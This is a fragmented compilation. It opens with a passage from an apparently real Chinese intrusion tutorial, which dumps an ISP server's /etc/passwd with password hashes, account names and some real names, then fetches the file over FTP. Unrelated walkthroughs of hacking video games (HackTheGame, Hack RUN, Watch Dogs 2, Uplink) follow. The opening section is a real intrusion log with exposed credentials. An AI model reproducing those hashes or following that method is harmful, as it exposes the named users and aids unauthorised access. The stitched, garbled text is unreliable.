passwdroot:abcdefghijklmn:0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/usr/lib/news:uucp:*:10:14:uucp:/var/spool/uucppublic:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashnobody:*:-1:100:nobody:/dev/null:ftp:*:404:1::/home/ftp:/bin/bashguest:*:405:100:guest:/dev/null:/dev/nullshan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bashfax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bashtham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bashccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bashsk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bashservices:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bashrichard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bashlilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bashsupport:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bashstonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/cshbear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bashlance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bashcaves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bashsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bashkingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bashrecycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bashrecycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bashrecycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bashhxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bashgoodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bashrwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bashcharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bashslb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bashs6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bashlsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bashlilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bashnalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bashtoonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bashyahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bashbasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bashwunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bashkaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bas hfan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash(CoolFire 注: 因为使用PaSs2DiC 很容易找出ID 与Password 相同的. 故除了Coffee 外, 其它我找到密码的EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)www:/etc$ exitlogoutConnection closed by foreign host.(可以走了!! 改用FTP 将/etc/passwd 给抓回来吧!).tw> ftp Connected to .220-220- 欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!220-220-220- There are 0 users in FTP Server now.220- 目前已有0 使用者在此Server 上.220- If you have any suggestion, please mail to:220- service@xx.xxxxxxx.xxx.xx.220-220-220-220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.(还是使用刚刚的帐号进入)Name (:YourName): coffee331 Password required for coffee.Password:230 User coffee logged in.Remote system type is UNIX.Using binary mode to transfer files.(直接到达档案放置地点)ftp> cd /etc250 CWD command successful.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.ttysfdprmgroupissuemotdmtoolsprofilesecurettyshellstermcapskelcsh.cshrccsh.loginlilo。



(⿊客游戏)HackTheGame1.21过关攻略第⼀关:标题 : 您好来⾃ : chaozz@----------------------------------------------------------您好 hahaya,我对你寄予⾮常⾼的期望, 您的计算机技能远⾼于正常⽔平, 所以我猜你⾄少能够过2关.您的第⼀个⽬标是获得⼀个port扫描⼯具。



⼯具的⽂件名称是: PortScannerW32.exe它应该在⼀个名叫HackTools的⽬录中。

下⾯是这项任务中你所须要的⼀些数据:他的IP地址:开放port : 2657username : secret密码 : admin1234⾸先Ping他的IP地址看看他是否在线。

然后⽤他的IP和port远程登陆到他的电脑,窃取到⽂件后迅速离开!!! 注意 !!不要忘记删除TelnetLogs⽬录中的⽇志⽂件。




第五步:切换到指定⽂件夹下,⽤提供的Get File⼯具下载PortScannerW32.exe第六步:点击断开连接第⼆关:标题 : ⼲的好!来⾃ : chaozz@----------------------------------------------------------⼲的好 hahaya,好了,你得到了portscanner。





Hack RUN全通关攻略Hack RUN 通关全攻略1-52关全看不懂英文就自己度娘或者gg吧主要是web的时候有些网站打不开需要翻墙才能阅读到内容,加上全英文,不然这个游戏难度其实还可以1. You accepted the offer from your employer.Greetings,You don't know who I am but I have been watching you for some time. Do not be alarmed, I am not connected with the authorities.I would like to hire you for something very important. I need to locate some information contained within the computer systems of an organization, and I believe you may know how to access it.Accept my offer, and you will be generously rewarded.Your Future EmployerOne thing more... I would be very disappointed if you were to decline my offer; I strongly suggest you accept it.2. You successfully started up your localhost machine.3. You successfully executed a system command.4. You have been hired to hack into an organization to access their data. Your employer gave you a hack routine that you can launch with the command 'run'.5. You successfully launched the hack routine by executing the 'run' command.6. You successfully connected to the gateway server of the organization by executing the 'gate' command.7. You successfully hacked into the organization's gateway system using Alice's 'password'.8. You successfully hacked into Alice's workstation using her 'password'.9. You successfully hacked into Brian's workstation using his 'baseball' password.10. You successfully hacked into Cathy's workstation using her 'love' password.11. You successfully hacked into David's workstation using his 'baseball' password.12. You successfully hacked into Elise's workstation using her 'hireme' password.13. Your employer upgraded your hack routine to connect to the RUN Human Resources system. Use the command 'hr' within the hack routine.14. You successfully hacked into the Human Resources system with Elise's 'hireme' password.15. You successfully hacked into Frank's workstation with his '11111971' password.16. Your employer upgraded your hack routine to connect to the Sales Rep system. Use the command 'reps' within the hack routine. Frank told Elise he reset Gayle Ford's password (and all the other sales reps passwords) to 'may' and their usernames are not their first names.17. You successfully hacked into Gayle Ford's Sales Rep system using 'gford' and 'may'.18. You successfully hacked into Hank Hamm's Sales Rep system using 'hhamm' and 'may'.19. You successfully hacked into Irene Smith's Sales Rep system using 'ismith' and 'may'.20. You successfully hacked into Julian Russo's Sales Rep system using 'jrusso' and 'may'.21. You successfully hacked into Kate Piet's Sales Rep system using 'kpiet' and 'may'.22. You successfully learned that Kate wants Larry to research Alex Thomason and your employer upgraded your hack routine to connect to RUN's admin system. Use the command 'admin' within the hack routine.23. You successfully hacked into the admin system as Larry using his 'sex' password.24. You received an urgent message.25. You (barely) survived an attack by Larry, the head of RUN security.26. You received a message from your employer stating, 'I cannot help you recover from your attack. You are on your own.'27. Your localhost was damaged and you lost most of your routines. You also received a message (playme) from your ally, Marie.28. You successfully hacked into Nigel's government agency system with address '71.4462.232'29. You successfully hacked into Olive's government agency system with address '22.3201.556'30. You successfully hacked into Peter's government agency system with address '93.482.3388'31. You successfully hacked into the government QUERY system with address '94.200.3331'32. You successfully hacked into the government R.O.B.O.T. system with address '75.2288.112'33. You successfully hacked into Sasha's government agency system with address '16.2222.900'34. You received a message named 'idea' from Marie. She believes your employer is a member of the group controlling the governments and RUN.35. Marie upgraded your system to trace your employer. Use the 'trace' command within Marie's 'backdoor' routine.36. You successfully established a trace to your employer by using Marie's 'trace' command within her 'backdoor' routine.37. You received a message named 'plan' from your ally, Marie. She wants you to access the 'uplink' prompt on your employer's system to discover what their plan is.38. You successfully hacked into the uplink system with Marie's help.39. You successfully hacked into Victor's workstation using his 'gpsvxz' password.40. You received a message named 'dead' from Marie.41. You learned of Marie's death and of her message to you on . Learn about your alien name using your full name (which has the same initials of ACT).42. You downloaded Marie's UFO routine to your local system. Use 'ufo' to execute it from within Marie's 'backdoor' routine.43. You successfully hacked into Wanda's UFO system using her '01110111' password.44. You successfully hacked into Xander's UFO system using the lowercase name of the current month ('january', 'february', 'march',...) as his password.45. You successfully connected to the Prisoner database.46. You successfully freed Alice and a voicemail message has been left for you on your localhost sytem. Use 'v' to listen to your message.47. You listened to Yurgon's voicemail message. She told you that she may still have an account on the UFO system and her password used to be 'phone'.48. You successfully hacked into Yurgon's UFO system using her 'phone' password.49. You successfully transmitted a message to the Zyrgorkn using the 'radio' program in Yurgon's UFO system on frequency 883.34. They want you to use the hidden 'diplomacy' program.50. You successfully connected to the diplomacy system using the 'zyrgorkn' race and Yurgon's 'peace' password.51. You successfully sent your location coordiates to the Zyrgorkn race. Their warriors have been sent to Earth to finish the battle. Yurgon left you a message named 'earth' on your local system.52. You won! You successfully drove the aliens from Earth and exposed RUN's secrets to the world. Game Over!发自我的 iPad以下是游戏过程的copy,只有一部分不全Local System StartupBootup CompleteVersion 5.4.61022014 all rights reservedStarted: 09-2月-2014 17:56:22type 'help' for helplocalhost> helplocalhost help menu:alt display a list of alternate commands (e)xit log out and shut down your localhost (h)elp display a list of system commands(l)s list all files in the current directory (t)ype [file] type out the contents of a file--- any key to continue -----------------------------------------------------------SUCCESSFULLY REACHED LEVEL 3You successfully executed a system command.--------------------------------------------------------localhost> altAlternate Commandsach show a list of all achievementsalt display this list of alternate commandsanswer view answer for the current level clr clears the content on the screen hint view a hint for the current level notes open the notes programtips view tipsNote, these commands can be used on any system. localhost> ach1. You accepted the offer from your employer. Greetings,You don't know who I am but I have been watching you for some time. Do not be alarmed, I am not connected with the authorities.I would like to hire you for something very important. I need to locate some information contained within the computer systems of an organization, and I believe you may know how to access it.Accept my offer, and you will be generously rewarded.Your Future EmployerOne thing more... I would be very disappointed if you were to decline my offer; I strongly suggest you accept it.2. You successfully started up your localhost machine.3. You successfully executed a system command.localhost> notesOpening notepad...localhost> lsFile list:readme 1k -rw wwr r-xlocalhost> type readmeI'm glad you decided to accept my offer. Trust me, I'll make it worth your while. By now the hack routine should be installed on your local system; just type 'run' to start it up.Your Employer--- any key to continue -----------------------------------------------------------SUCCESSFULLY REACHED LEVEL 4You successfully read the message (readme) from your employer. --------------------------------------------------------localhost> runrunning the hack routine...successfully launchedtype 'help' for help--- any key to continue -----------------------------------------------------------SUCCESSFULLY REACHED LEVEL 5You successfully launched the hack routine.--------------------------------------------------------hack> lsunrecognized command: 'ls'hack> altAlternate Commandsach show a list of all achievementsalt display this list of alternate commandsanswer view answer for the current level clr clears the content on the screen hint view a hint for the current level notes open the notes programtips view tipsNote, these commands can be used on any system.hack> hintHint to reach level 6:The hack routine is a computer program that will allow you to connect to the organization's systems. There are several commands you can execute from within the hack routine, try entering 'help' to learn how to use this routine.hack> answerRetrieving answer...hack> ach1. You accepted the offer from your employer.Greetings,You don't know who I am but I have been watching you for some time. Do not be alarmed, I am not connected with the authorities.I would like to hire you for something very important. I need to locate some information contained within the computer systems of an organization, and I believe you may know how to access it.Accept my offer, and you will be generously rewarded.Your Future EmployerOne thing more... I would be very disappointed if you were to decline my offer; I strongly suggest you accept it.2. You successfully started up your localhost machine.3. You successfully executed a system command.4. You have been hired to hack into an organization to access their data. Your employer gave you a hack routine that you can launch with the command 'run'.5. You successfully launched the hack routine by executing the 'run' command.hack> helphack routine help menuatip display a tip on hacking(e)xit exit the employer's hack routine(g)ate hack into the gateway system(h)elp display a list of hack commands note display info about this routine hack> gateEstablishing a connection to the Gateway System... Connection Established.Log in with your Gateway account--- any key to continue -----------------------------------------------------------SUCCESSFULLY REACHED LEVEL 6You successfully connected to the gateway server.--------------------------------------------------------username: helppassword: atipInvalid Passwordpassword:Type 'atip' for a tipDisconnected from the gateway systemhack> atipYou'll need a username and password to gain access to their systems, so I hope you'll be able to figure out alice's password.I don't think you'll mind me saying she's not very bright so figuring out her password should be a simple task for a seniorhacker like yourself.hack> gateEstablishing a connection to the Gateway System... Connection Established.Log in with your Gateway accountusername: alicepassword: 123456Invalid Passwordpassword: 111111Invalid Passwordpassword: aliceMaximum attempts reachedType 'atip' for a tipDisconnected from the gateway systemhack> atipYou'll need a username and password to gain access to their systems, so I hope you'll be able to figure out alice's password.I don't think you'll mind me saying she's not very bright so figuring out her password should be a simple task for a senior hacker like yourself.hack> helphack routine help menuatip display a tip on hacking(e)xit exit the employer's hack routine(g)ate hack into the gateway system(h)elp display a list of hack commandsnote display info about this routinehack> noteThis routine will allow you to establish a connection to their gateway server. Access as much data on their servers as you can, the routine will transmit all information to me automatically. Just keep digging - the deeper you go the dirtier it will get.Do well and I'll be in touch to upgrade your system.hack> ach1. You accepted the offer from your employer.Greetings,You don't know who I am but I have been watching you for some time. Do not be alarmed, I am not connected with the authorities.I would like to hire you for something very important. I need to locate some information contained within the computer systems of an organization, and I believe you may know how to access it.Accept my offer, and you will be generously rewarded.Your Future EmployerOne thing more... I would be very disappointed if you were to decline my offer; I strongly suggest you accept it.2. You successfully started up your localhost machine.3. You successfully executed a system command.4. You have been hired to hack into an organization to access their data. Your employer gave you a hack routine that you can launch with the command 'run'.5. You successfully launched the hack routine by executing the 'run' command.6. You successfully connected to the gateway server of the organization by executing the 'gate' command.hack> lsunrecognized command: 'ls'hack> hintHint to reach level 7:You have connected to the organization's computer system, but you need to log in. Your employer left a tip in the hack routine called 'atip'. This should help you discover how to log in. Ifyou are unable to discover the 'password' you should use, try thinking of a simple 'password' that people commonly use.hack> gateEstablishing a connection to the Gateway System... Connection Established.Log in with your Gateway accountusername: alicepassword: passwordSuccessful login!Welcome to the Gateway System--- any key to continue -----------------------------------------------------------SUCCESSFULLY REACHED LEVEL 7You successfully hacked into the gateway system.--------------------------------------------------------gateway> lsFile list:welcome 2k rrr rrr rrrgateway> type welcomeWelcome to the Gateway System!This system will allow you to connect or *jump* directly to your office workstation. Simply use the command: jump [username] and then enter your workstation password. Please let me know if you have any questions,Mr. AndersonRUN IT Specialistgateway> helpGateway help menu(e)xit exit and disconnect from this gateway (h)elp display a list of system commands(j)ump [username] jump or connect to your workstation (l)s list all files in the current directory (t)ype [file] type out the contents of a file gateway> jump aliceEstablishing a connection to alice's Workstation... Connection Established.Enter your Workstation password.password: passwordSuccessful login!Logged into alice's workstation--- any key to continue -----------------------------------------------------------SUCCESSFULLY REACHED LEVEL 8You successfully hacked into Alice's workstation.--------------------------------------------------------alice> lsFile list:no files foundalice> helpalice's Workstation help menu(e)xit logout and exit from this workstation (h)elp display a list of system commands(l)s list all files in the current directory (m)ail launches your email message program (w)eb launches a web browseralice> mailLaunching alice's mail...alice.mail: lsList of Messages:alex <sent>cathy <sent>alice.mail: type alexunrecognized command: 'type alex'alice.mail: helpmail help menu(e)xit exit the mail program(h)elp display a list of mail commands(l)s list all mail messages on your system (s)how [message] show the contents of a messagealice.mail: show alexHey Alex,I haven't heard from you in a while. Are you free to get together tonight?Miss you,Alicealice.mail: show cathyHi Cathy!Thanks again so much for helping me get this job! I'm not surewhat I'm supposed to be doing yet, but I'm sure I'll figure it out. What's up with that guy Brian? He's really psycho about baseball. Like it's the secret to the universe. He's a bit jumpy, too... Anyway thanks again and I owe you a drink!Alicealice.mail: exitExited from alice's mailalice> weblaunching web browseralice> hintHint to reach level 9:By now you know Alice has a workstation on the system so maybe other people do as well. Try to connect to their workstations by guessing their passwords. You have all the clues you need in her emails to complete this level.alice> lsFile list:no files foundalice> helpalice's Workstation help menu(e)xit logout and exit from this workstation (h)elp display a list of system commands(l)s list all files in the current directory (m)ail launches your email message program (w)eb launches a web browseralice> altAlternate Commandsach show a list of all achievementsalt display this list of alternate commandsanswer view answer for the current level clr clears the content on the screen hint view a hint for the current level notes open the notes programtips view tipsNote, these commands can be used on any system.alice> tipsDisplaying tips, hints & answersalice> lsFile list:no files foundalice> mailLaunching alice's mail...alice.mail: lsList of Messages:alex <sent>cathy <sent>alice.mail: helpmail help menu(e)xit exit the mail program(h)elp display a list of mail commands(l)s list all mail messages on your system (s)how [message] show the contents of a message alice.mail: exitExited from alice's mailalice> exitDisconnected from alice's Workstationgateway> lsFile list:welcome 2k rrr rrr rrrgateway> helpGateway help menu(e)xit exit and disconnect from this gateway (h)elp display a list of system commands(j)ump [username] jump or connect to your workstation (l)s list all files in the current directory (t)ype [file] type out the contents of a file gateway> jump chatyEstablishing a connection to chaty's Workstation... Connection Established.Enter your Workstation password.password: passwordInvalid Passwordpassword:Disconnected from chaty's Workstationgateway> jump brianEstablishing a connection to brian's Workstation... Connection Established.Enter your Workstation password.password: baseballSuccessful login!Logged into brian's workstation--- any key to continue -----------------------------------------------------------SUCCESSFULLY REACHED LEVEL 9You successfully hacked into Brian's workstation.--------------------------------------------------------brian> lsFile list:no files foundbrian> mailLaunching brian's mail...brian.mail: lsList of Messages:alice <sent>cathy <sent>brian.mail: show cathyHey Cat, who's the new babe? She doesn't seem too bright but her body makes up for it. The Brian could really use some of that! Oh, I checked out that website you sent me . Not sure why you love them so much, but you must have your reasons... Anyway, you better find a way to hook me up with Alice!brian.mail: show aliceAlice, Welcome to Paradise!It's paradise because you get to work with me. I'm here to give you a hand wherever you want it. And don't listen to any of the rumors about RUN being a shady company. None of the crap being said about us working with drug dealers is true. I hope you like the place and drop me a line anytime if you're in the mood for some juicy gossip.brian.mail: noteunrecognized command: 'note'brian.mail: exitExited from brian's mail brian> noteunrecognized command: 'note' brian> notesOpening notepad...brian> notesOpening notepad...brian> web。





一、黑客技能介绍1. 敌人诊断:这项技能可以让你扫描周围的敌人,了解他们的能力和装备情况,为你的战略决策提供有力依据。

2. 电网控制:通过黑客技能,你可以远程控制城市的电网,关闭电源或者打开关键设备。


3. 远程控制车辆:作为黑客,你可以远程操控城市中的车辆,包括汽车、摩托车和无人机等。


4. 电话欺骗:你可以利用黑客技能模拟别人的电话声音,通过欺骗来获得情报或者干扰敌人的行动,为你自己创造优势。

5. 安全摄像头控制:通过黑客技能,你可以控制城市中的摄像头,获取情报、监视敌人的行动或者寻找游戏中的隐藏道路和秘密。

二、任务策略攻略1. 规划步骤:在进行任务之前,先规划好每一个步骤。



2. 创造干扰:当你面对强大的敌人或者被困境中时,可以利用黑客技能制造干扰,为自己争取时间和空间。


3. 多样化的战术:黑客技能给予了你多种战术选择。



4. 与他人合作:看门狗2提供了多人在线合作模式,你可以与其他玩家组队完成任务。







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→SA VE POINTCLOSING TIME正式来到邮局的大堂位置,有需要的话还是可以先尝试一下各个按键的操作,不过玩者拥有的时候已经不多,稍稍的话便会立即触发起敌人,亦即是邮局守卫的反抗。











2、BEHIND THE SCENES经过通风口顺利来到邮局的另一边,从四周的环境上来看应该是储物室,而且这里亦有为数不少的守卫在把守着。


































HackTheGame完全攻略Hack The Game完全攻略[⿊客反病毒组织]蹲街⾓暗杀启动游戏,输⼊⽤户名,回车。



Ping:⼀个图形界⾯的ping⼯具Telnet: ⼀个图形界⾯的Telnet⼯具GetFile:⼀个图形界⾯远程下载⽬标机器⽂件的⼯具。




(别⾼兴太早,⾥⾯没有中⽂哦)Jobs done:你已经完成的任务数Trace:当你开始⼊侵⽬标机器时,⽬标机器上的追踪系统就开始追踪你的IP,如果这⾥显⽰了你的IP,你就已经被抓了,任务失败。

Times Busted:你被抓住的次数,(前科记录-_-!)Status:你当前的状态,offline:未与⽬标机器建⽴连接Info:游戏介绍,以及游戏的技巧与命令提⽰信息,看⼀看有助于⼊门哦(还是全英⽂的)其中需要⽤到的命令:SA VE 保存游戏记录,退出游戏之前必须⽤该命令保存游戏进度,否则每次都从头开始LOAD 加载上次退出游戏时,你登陆的⽤户名SA VE的游戏进度。

HELP 显⽰帮助⽂档SHUTDOWN 退出游戏建议:开始玩之前,可以先在当前界⾯输⼊⼀些熟悉的dos命令,如:dir ,cd,cls,ipconfig 等等,熟悉⼀下⾃⼰的环境,这个游戏制作的⽐较逼真,⾥⾯可以查看到winnt系统⽬录,其他⼀些……开始游戏啦~~~O(∩_∩)O哈哈~任务⼀:⼊侵⽬标机器,获取⽬标⽂件,全⾝⽽退。









再和Mr Jones谈话接任务任务1:到Old Shelter找到装有微晶片的箱子去右下租飞车处,驾驶员要求分得酬金的25%,砍价到15%(女性砍价到15%,男性到20%,尊重妇女?!),出发前往迷宫地图。



和Mr Jones谈话接新任务。

任务2:在Factory Site消灭变异生物迷宫最低层的Boss,会不停生出小怪物,拿机枪绕圈跑打吧,用机器人修理技能加机器人的能量打也很快。



回城和Mr Jones谈话接新任务。



可以和新的NPC,右下的Mr Smith谈话接支线任务,有找东西、运送、灭口、杀怪等,到了迷宫照着红点走就可以了。

和Mr Jones谈话接任务,炸毁Oxygenetic的3个工厂任务4:在Oxygenetic Fabric的第一工厂设置4个C4炸弹。



The Ultimate Uplink Guide v1.15 Welcome to the Ultimate Uplink Guide. This guide contains pretty much everything you will ever need to know to be successful in Uplink, and is designed to help those that have never played the game before to get to grips with it, but also to allow people who know what they are doing to see if there is anything they could do better. It has mission guides, general tips, and although it wont actually contain all the secrets of the game, it will point you in the right direction to finding them your self. Section ListingSection 1 – The Basics1.1 – The HUD1.2 – Connection Bouncing1.3 – Being Traced1.4 – Logs1.5 – Server Links1.6 – Uplink Internal Services1.7 – The Game Over ScreenSection 2 – Game Information2.1 – Uplink Rating2.2 – Neuromancer Rating2.3 – Software2.4 – Hardware2.5 – Gateways2.6 – System Types2.7 – Security Systems2.8 – Console Commands2.9 – Changing Your Records2.10 – User AccountsSection 3 – Mission Guides3.1 - LANsSection 4 – Storyline Missions4.1 – Arunmor Missions4.2 – ARC MissionsSection 5 – Special Servers5.1 – Important Servers5.2 – Fun/Joke ServersSection 6 – Hacking Help6.1 – Bank Hacking6.2 – General TipsSection 7 – Common BugsSection 8 – FAQSection 9 – SecretsSection 10 – The Bonus DiskSection 11 – Patch AdditionsSection 12 – Pop Tarts12.1 – Pop Tart Flavours12.2 –Uses for Pop Tarts12.3 – Which Flavour is best?12.4 - ConclusionSection 13 – Conclusion13.1 – Contact13.2 - LinksSection 1 – The BasicsThis section describes the basics of the game, how to get started and to hack successfully with out being caught.1.1 – The HUDThe focus of the whole game, your Heads Up Display.Along the top, you have the date, the IP you are currently connected to, the CPU usage and Time Controls, and the World Map. Underneath the CPU usage gauge is a list of all software currently running, amount of the CPU they are currently using, and buttons to increase or decrease the CPU usage of each program. The Time Controls are 4 buttons that allow you to pause, and speed up time, and of course, return it to normal. The World Map shows your current connection route, and by clicking on it, you get a large version that allows you to select bounce routes, and buttons to save the routes while the game is still running.Uplink HUDAt the Bottom of the screen there are 6 Buttons, and an area that holds any email/mission statements you have. The first, and largest of the buttons opens the software menu, allowing you to run any software you currently have in your memory. The rest of the buttons allow you to view your current hardware, files, Personal status, and to send email. When you click one of these buttons, the appropriate display appears to the right.1.2 – Connection BouncingWhen you attempt to hack any server, you will need to bounce your connection through other servers otherwise you will be traced instantly, and disconnected before you’ve even gained access.When you want to connect to a server, go to the World Map, and click on the other servers (Represented by White Squares) around the map before clicking on the machine you want to connect to. This will give you time to do whatever it is you need to do on the server.The time you get depends on how many servers you bounce through, and what kind of access you have on those servers. A Regular account on a machine, like a Bank Account, (Indicated by the doted lines surrounding the server) will give you longer than a machine that you don’t have an account on, and a machine that you have Admin access on (Indicated by the solid box surrounding the server) will give you even longer.When you start to bounce your connection, it is a good idea to use InterNIC as the first bounce point (i.e. the first server you click on). This will be explained in the next section.If you find that an area of the map is too cluttered to see what links you are clicking on, you can use the zoom feature to enlarge a section of the map, and make it easier to click the link you need.1.3 – Being TracedAlmost any server you connect to will try to trace you the second you start hacking their security. The time this trace takes depends on how you have bounced your connection, but in the end, the same thing happens. The trace finishes, you are disconnected, and most likely disavowed, or at least fined and having something added to your criminal record. It’s part of your job to finish what ever you are doing before the time reaches 0. For this you need the Trace Tracker, to tell you how long there is before you are traced. You should always give your self enough time to do the job, there’s nothing worse then getting half was through a job, to then have to disconnect because you don’t have enough time left. Themore experienced you become, the better your abilities will get, and the faster you will be able to do things, therefore needing less time. The only thing for this is practice. The more you do, the better you get.1.4 – LogsEvery time you connect to a server, you create logs. Using these logs, a Company/Hacker can do a‘Passive Trace’ on you, by following the logs back through your bounce route and to your machine.To prevent this, you need to clear your logs. The safest way to do this is to delete your logs from your first bounce point. Because InterNIC’s password never changes, and they do not trace you, it is the best server to use for your first bounce point, as you can easily access the server’s logs and delete them. When you go to delete your logs, you must make sure you delete the right ones. The main logs you need to delete are the ‘Bounce’ logs, and the ‘Password Accepted’ logs, which look like the following; ‘Connection from routed to xxx.xxx.xxx.xxx’ (Bounce Log)‘From Password authentication accepted’ (Password Accepted Log)These are the logs you need to delete. It is important that you leave the actual connection logs there though, because you also leave logs when you disc onnect, and it would look suspicious if there was a disconnection log but no connection.By deleting these logs from your first bounce point after every hack, you should never be caught, as long as you aren’t too slow in doing it.Remember, everywhere keeps logs, including Voice Phone Systems. Just because you can’t get to the logs, it doesn’t mean they aren’t there.1.5 – Server LinksThe main thing you will see when you aren’t connected to a server is the links screen. This displays all the links that you currently have.At the bottom of this screen, there is a filter, which allows you to type in a piece of text, and show only the links containing that text. This is useful if you have a large number of links and need to find a specific one.At either side of each link, there is a blue box. The one on the left has a cross in it. Clicking on this will delete the link from your system, and will no longer show up on the World Map. The one on the right contains 2 circles. Clicking on this will make the box disappear, and then that link will not appear on the World Map, useful if the map is cluttered but you don’t want to delete your links.You can also connect directly to any server, simply by clicking on the appropriate link.You can find a collection of most of the Links in the game at InterNIC. Connecting to the InterNIC server, and clicking on the Browse button will bring up a list similar to your own Link display, that contains a huge number of links that you can add to your own list by clicking the blue box with the + symbol in.1.6 – Uplink Internal ServicesThis is the most important server in the game, and should be the first one you connect to. This is where you get your Missions, Software, Hardware, Gateways, Agent Rankings and News. These are the guys that provide and maintain your Gateway and upgrade when required. The provide the ability to contact any employers you wish to speak to, in order to get more details on missions, or get higher pay. You will also spend quite a bit of time there watching the news.1.7 – The Game Over ScreenWhen your agent is caught, or something else happens that stops him from working, when you try to log in with you character, the Game Over status screen will be displayed. This will contain the information of what you have done during your career.Section 2 – Uplink InformationThis section contains Information about Uplink, such as Uplink Ratings, Neuromancer ratings and how they change, and Software and Hardware Info.2.1 – Uplink RatingsThis is a list of the Uplink ratings you acquire through the game. You increase your rating by hacking systems and doing jobs. The harder the work you do, the more your rating goes up.Grade 16 – RegisteredGrade 15 – BeginnerGrade 14 – NoviceGrade 13 – ConfidentGrade 12 – Interm ediateGrade 11 – SkilledGrade 10 – ExperiencedGrade 9 – KnowledgeableGrade 8 – Uber-SkilledGrade 7 – ProfessionalGrade 6 – EliteGrade 5 – MageGrade 4 – ExpertGrade 3 – VeteranGrade 2 – Techno-mageGrade 1 – TERMINAL2.2 – Neuromancer RatingsYour Neuromancer Rating is an unofficial rating given to you by the hacker community. It has little effect in the game, though it does say something about your morals as a hacker. If you are the kind of person who will do things that damage a company, your rating will go up, but if you do things that are bad for other hackers, your rating will drop. And it is A LOT easier to make it drop than it is to make it go up. Doing missions such as ‘Destroy a Corporate Database’ will improve your Neuromancer rating, where as doing missions like ‘Trace a Hacker’ will decrease it a lot.Neutral - Aggressive - Single Minded - Activist - Anarchic – Revolutionary (Good 